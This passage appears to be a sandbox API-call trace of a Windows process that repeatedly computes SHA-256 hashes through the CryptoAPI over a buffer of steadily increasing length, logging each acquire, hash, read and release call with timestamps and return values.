	[0192.642] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0192.642] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.642] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302f58
	[0192.642] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302f58, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302f58, pdwDataLen=0x1283b0) returned 1
	[0192.642] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.642] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.643] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.643] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.643] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0192.643] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.643] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302f80
	[0192.643] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302f80, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302f80, pdwDataLen=0x1283b0) returned 1
	[0192.643] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.643] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.643] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.644] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.644] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0192.644] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.644] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302fa8
	[0192.644] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302fa8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302fa8, pdwDataLen=0x1283b0) returned 1
	[0192.644] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.644] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.644] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.645] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.645] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0192.645] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.645] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302fd0
	[0192.645] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302fd0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302fd0, pdwDataLen=0x1283b0) returned 1
	[0192.645] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.645] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.645] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.646] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.646] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0192.646] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.646] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302ff8
	[0192.646] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302ff8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302ff8, pdwDataLen=0x1283b0) returned 1
	[0192.646] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.646] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.646] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.646] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.646] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0192.647] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.647] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303020
	[0192.647] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303020, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303020, pdwDataLen=0x1283b0) returned 1
	[0192.647] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.647] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.647] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.647] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.647] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0192.647] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.647] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303048
	[0192.647] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303048, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303048, pdwDataLen=0x1283b0) returned 1
	[0192.647] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.647] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.647] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.648] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.648] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0192.648] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.648] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303070
	[0192.648] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303070, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303070, pdwDataLen=0x1283b0) returned 1
	[0192.648] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.648] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.648] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.649] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.649] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0192.649] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.649] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303098
	[0192.649] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303098, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303098, pdwDataLen=0x1283b0) returned 1
	[0192.649] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.649] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.649] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.650] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.650] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0192.650] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.650] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23030c0
	[0192.650] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23030c0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23030c0, pdwDataLen=0x1283b0) returned 1
	[0192.650] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.650] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.650] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.650] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.650] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0192.651] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.651] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23030e8
	[0192.651] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23030e8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23030e8, pdwDataLen=0x1283b0) returned 1
	[0192.651] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.651] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.651] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.651] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.651] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0192.651] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.651] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303110
	[0192.651] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303110, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303110, pdwDataLen=0x1283b0) returned 1
	[0192.651] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.651] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.651] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.652] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.652] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0192.652] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.652] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303138
	[0192.652] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303138, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303138, pdwDataLen=0x1283b0) returned 1
	[0192.652] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.652] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.652] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.653] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.653] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0192.653] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.653] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303160
	[0192.653] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303160, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303160, pdwDataLen=0x1283b0) returned 1
	[0192.653] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.653] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.653] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.654] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.654] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0192.654] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.654] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303188
	[0192.654] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303188, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303188, pdwDataLen=0x1283b0) returned 1
	[0192.654] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.654] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.654] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.654] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.654] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0192.655] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.655] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23031b0
	[0192.655] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23031b0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23031b0, pdwDataLen=0x1283b0) returned 1
	[0192.655] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.655] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.655] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.655] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.655] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0192.655] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.655] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23031d8
	[0192.655] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23031d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23031d8, pdwDataLen=0x1283b0) returned 1
	[0192.655] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.655] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.655] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.656] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.656] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0192.656] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.656] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303200
	[0192.656] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303200, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303200, pdwDataLen=0x1283b0) returned 1
	[0192.656] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.656] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.656] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.657] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.657] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0192.657] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.657] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303228
	[0192.657] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303228, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303228, pdwDataLen=0x1283b0) returned 1
	[0192.657] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.657] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.657] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.658] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.658] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0192.658] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.658] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303250
	[0192.658] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303250, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303250, pdwDataLen=0x1283b0) returned 1
	[0192.658] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.658] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.658] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.658] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.659] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0192.659] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.659] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303278
	[0192.659] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303278, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303278, pdwDataLen=0x1283b0) returned 1
	[0192.659] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.659] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.659] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.659] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.659] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0192.659] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.659] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23032a0
	[0192.659] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23032a0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23032a0, pdwDataLen=0x1283b0) returned 1
	[0192.659] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.660] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.660] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.660] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.660] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0192.660] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.660] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23032c8
	[0192.660] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23032c8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23032c8, pdwDataLen=0x1283b0) returned 1
	[0192.660] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.660] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.660] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.662] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.662] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0192.662] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.662] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23032f0
	[0192.662] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23032f0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23032f0, pdwDataLen=0x1283b0) returned 1
	[0192.662] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.662] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.662] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.662] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.662] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0192.662] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.663] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303318
	[0192.663] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303318, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303318, pdwDataLen=0x1283b0) returned 1
	[0192.663] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.663] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.663] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.663] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.663] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0192.663] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
